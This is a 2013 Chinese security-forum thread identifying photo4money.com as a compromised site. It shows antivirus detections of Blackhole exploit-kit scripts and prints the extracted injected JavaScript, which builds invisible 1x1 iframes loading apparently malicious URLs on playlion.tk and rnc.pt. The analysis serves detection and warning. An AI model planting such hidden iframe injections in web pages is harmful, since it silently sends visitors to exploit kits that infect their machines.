查看: 1091|回复: 3
收起左侧

[已鉴定] http://photo4money.com/【挂马 by蓝核 哀酱 很多马】

[复制链接]
墨家小子
发表于 2013-4-11 16:31:59 | 显示全部楼层 |阅读模式
本帖最后由 蓝核 于 2013-4-11 17:29 编辑

2013/4/11        16:30:50        已删除         l\AA        C:\Program Files (x86)\Internet Explorer\iexplore.exe        C:\Sandbox\AA\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TA4N2M0P\action[1].js        JS/Exploit-Blacole.eu (特洛伊)
2013/4/11        16:30:51        已删除         l\AA        C:\Program Files (x86)\Internet Explorer\iexplore.exe        C:\Sandbox\AA\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F3U0MTCG\popup[1].js        JS/Exploit-Blacole.eu (特洛伊)
2013/4/11        16:30:51        已删除         l\AA        C:\Program Files (x86)\Internet Explorer\iexplore.exe        C:\Sandbox\AA\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F3U0MTCG\script[1].js        JS/Exploit-Blacole.eu (特洛伊)
2013/4/11        16:30:51        已删除         l\AA        C:\Program Files (x86)\Internet Explorer\iexplore.exe        C:\Sandbox\AA\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F3U0MTCG\stuff[1].js        JS/Exploit-Blacole.eu (特洛伊)
2013/4/11        16:30:54        已删除         l\AA        C:\Program Files (x86)\Internet Explorer\iexplore.exe        C:\Sandbox\AA\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TA4N2M0P\photo4money_com[1].htm\00000b49.js        JS/Exploit-Blacole.le (特洛伊)
2013/4/11        16:30:54        已删除         l\AA        C:\Program Files (x86)\Internet Explorer\iexplore.exe        C:\Sandbox\AA\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TA4N2M0P\photo4money_com[1].htm\00004150.js        JS/Exploit-Blacole.le (特洛伊)
2013/4/11        16:30:54        已删除         l\AA        C:\Program Files (x86)\Internet Explorer\iexplore.exe        C:\Sandbox\AA\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TA4N2M0P\photo4money_com[1].htm\00005083.js        JS/Exploit-Blacole.le (特洛伊)
2013/4/11        16:30:54        已删除         l\AA        C:\Program Files (x86)\Internet Explorer\iexplore.exe        C:\Sandbox\AA\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TA4N2M0P\photo4money_com[1].htm\00005ed3.js        JS/Exploit-Blacole.le (特洛伊)
2013/4/11        16:30:55        已删除         l\AA        C:\Program Files (x86)\Internet Explorer\iexplore.exe        C:\Sandbox\AA\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TA4N2M0P\photo4money_com[1].htm\00006f79.js        JS/Exploit-Blacole.le (特洛伊)
2013/4/11        16:30:55        已删除         l\AA        C:\Program Files (x86)\Internet Explorer\iexplore.exe        C:\Sandbox\AA\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TA4N2M0P\photo4money_com[1].htm\00007ba9.js        JS/Exploit-Blacole.le (特洛伊)
蓝核
发表于 2013-4-11 16:53:06 | 显示全部楼层
  1. (function () {
  2.     var e = document.createElement('iframe');

  3.     e.src = 'http://playlion.tk/dtd.php';
  4.     e.style.position = 'absolute';
  5.     e.style.border = '0';
  6.     e.style.height = '1px';
  7.     e.style.width = '1px';
  8.     e.style.left = '1px';
  9.     e.style.top = '1px';

  10.     if (!document.getElementById('e')) {
  11.         document.write('<div id=\'e\'></div>');
  12.         document.getElementById('e').appendChild(e);
  13.     }
  14. })();
复制代码
  1. (function () {
  2.     var kjzi = document.createElement('iframe');

  3.     kjzi.src = 'http://rnc.pt/crmgesfrota/count.php';
  4.     kjzi.style.position = 'absolute';
  5.     kjzi.style.border = '0';
  6.     kjzi.style.height = '1px';
  7.     kjzi.style.width = '1px';
  8.     kjzi.style.left = '1px';
  9.     kjzi.style.top = '1px';

  10.     if (!document.getElementById('kjzi')) {
  11.         document.write('<div id=\'kjzi\'></div>');
  12.         document.getElementById('kjzi').appendChild(kjzi);
  13.     }
  14. })();
复制代码
  1. (function () {
  2.     var e = document.createElement('iframe');

  3.     e.src = 'http://playlion.tk/dtd.php';
  4.     e.style.position = 'absolute';
  5.     e.style.border = '0';
  6.     e.style.height = '1px';
  7.     e.style.width = '1px';
  8.     e.style.left = '1px';
  9.     e.style.top = '1px';

  10.     if (!document.getElementById('e')) {
  11.         document.write('<div id=\'e\'></div>');
  12.         document.getElementById('e').appendChild(e);
  13.     }
  14. })();
复制代码
蓝核
发表于 2013-4-11 16:54:36 | 显示全部楼层
  1. src = 'http://playlion.tk/dtd.php
复制代码
  1. src = 'http://rnc.pt/crmgesfrota/count.php'
复制代码
  1. 'http://playlion.tk/dtd.php
复制代码
哀酱俏佳人
发表于 2013-4-11 17:02:48 | 显示全部楼层
(function () {
    var e = document.createElement('iframe');

    e.src = 'http://playlion.tk/dtd.ph
p';
    e.style.position = 'absolute';
    e.style.border = '0';
    e.style.height = '1px';
    e.s
tyle.width = '1px';
    e.style.left = '1px';
    e.style.top = '1px';

    if (!document.getElement
ById('e')) {
        document.write('<div id=\'e\'></div>
');
        document.getElementById('e').appendChild(e);
    }
})();


(function () {
    var t = document.createElement('iframe');

    t.src = 'http://rnc.pt/crmgesfrota
/count.php';
    t.style.position = 'absolute';
    t.style.border = '0';
    t.style.height = '1px'
;
    t.style.width = '1px';
    t.style.left = '1px';
    t.style.top = '1px';

    if (!document.g
etElementById('t')) {
        document.write('<div id=\'t\'></div>
');
        document.getElementById('t').appendChild(t);
    }
})();




<script type="text/javascript" src="/js/swfobject-2.2.min.js"></script>



<script src=
"http://mbox.offermatica.intuit.com/m2/intuit/mbox/standard?mboxHost=turbotax.com&mboxSession=136565
0426619-488947&mboxPage=1365650426619-488947&screenHeight=768&screenWidth=1024&browserWidth=1256&bro
wserHeight=605&browserTimeOffset=-420&colorDepth=24&mboxXDomain=x-only&mboxCount=1&ttcom_visitor=nul
l&priorityCode=3468337910&userSegmentation=&cs-uri-stem=%2Flp%2Fty12%2Fppc%2Ftmp5_5p.jsp&zna=0&cid=p
pc_ask_b_stan_dk_us_hv-brand-turbotax-main&ven=ask&kw=%7BsearchQuery%7D&skw=turbotax&UserHasNEAuthen
ticated=false&mbox=ttcom_redirect&mboxId=0&mboxTime=1365625247320&mboxURL=http%3A%2F%2Fturbotax.com%
2Flp%2Fty12%2Fppc%2Ftmp5_5p.jsp%3Fzna%3D0%26znp%3D1%26srqs%3Dnull%26cid%3Dppc_ask_b_stan_dk_us_hv-br
and-turbotax-main%26srid%3Dsr3_44471139_ak%26skw%3Dturbotax%26adid%3DByYourSide%26kw%3D%257BsearchQu
ery%257D%26ven%3Dask%26&mboxReferrer=https%3A%2F%2Fads.pureleads.com%2Fcrd%3FcString%3DzutGlRkCwaHn9
MfazSeVE6D9G)NKMDRylnMWk0EpA1nh))B3VmckatCy7cEIijGbuNn6wqMtv49zfu6WEcG4bPh4Y*lGE5qo8t7R9Ccpk7SV3dDKN
kgaQKxuAREex*6ypaWIlYmaIGn)fxwvEX82iBodduuxMuwb3foK8Tj*YQHCFQqQsmN942lqHWt*yq9cnq59txF0uATAq56RnXq4O
wxrj*G4CKVOs9US3Yn2g3BoEz3aQ0MMfkyaH9L*XSoLh3iS4Y2h1babr0wXKJHQRNAo0xrcrYtbFpmxM4Xyz8y5w69WxxLG8lg4v
XM0XseSkkdE2uVy7m)m5Jrn62uu0s9GVGZ3LbxyBotAp3o7C1P0bAwUNRFsvkT*9x9cjbKI&mboxVersion=40" language=
"JavaScript"></script>



<script src=
"http://mbox.offermatica.intuit.com/m2/intuit/mbox/standard?mboxHost=turbotax.com&mboxSession=136565
0426619-488947&mboxPage=1365650426619-488947&screenHeight=768&screenWidth=1024&browserWidth=1256&bro
wserHeight=605&browserTimeOffset=-420&colorDepth=24&mboxXDomain=x-only&mboxCount=2&ttcom_visitor=nul
l&priorityCode=3468337910&userSegmentation=&cs-uri-stem=%2Flp%2Fty12%2Fppc%2Ftmp5_5p.jsp&zna=0&cid=p
pc_ask_b_stan_dk_us_hv-brand-turbotax-main&ven=ask&kw=%7BsearchQuery%7D&skw=turbotax&UserHasNEAuthen
ticated=false&mbox=ttcom_metrics&mboxId=0&mboxTime=1365625248877&mboxURL=http%3A%2F%2Fturbotax.com%2
Flp%2Fty12%2Fppc%2Ftmp5_5p.jsp%3Fzna%3D0%26znp%3D1%26srqs%3Dnull%26cid%3Dppc_ask_b_stan_dk_us_hv-bra
nd-turbotax-main%26srid%3Dsr3_44471139_ak%26skw%3Dturbotax%26adid%3DByYourSide%26kw%3D%257BsearchQue
ry%257D%26ven%3Dask%26&mboxReferrer=https%3A%2F%2Fads.pureleads.com%2Fcrd%3FcString%3DzutGlRkCwaHn9M
fazSeVE6D9G)NKMDRylnMWk0EpA1nh))B3VmckatCy7cEIijGbuNn6wqMtv49zfu6WEcG4bPh4Y*lGE5qo8t7R9Ccpk7SV3dDKNk
gaQKxuAREex*6ypaWIlYmaIGn)fxwvEX82iBodduuxMuwb3foK8Tj*YQHCFQqQsmN942lqHWt*yq9cnq59txF0uATAq56RnXq4Ow
xrj*G4CKVOs9US3Yn2g3BoEz3aQ0MMfkyaH9L*XSoLh3iS4Y2h1babr0wXKJHQRNAo0xrcrYtbFpmxM4Xyz8y5w69WxxLG8lg4vX
M0XseSkkdE2uVy7m)m5Jrn62uu0s9GVGZ3LbxyBotAp3o7C1P0bAwUNRFsvkT*9x9cjbKI&mboxVersion=40" language=
"JavaScript"></script>



还真多。。。


您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-2 16:39 , Processed in 0.117308 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表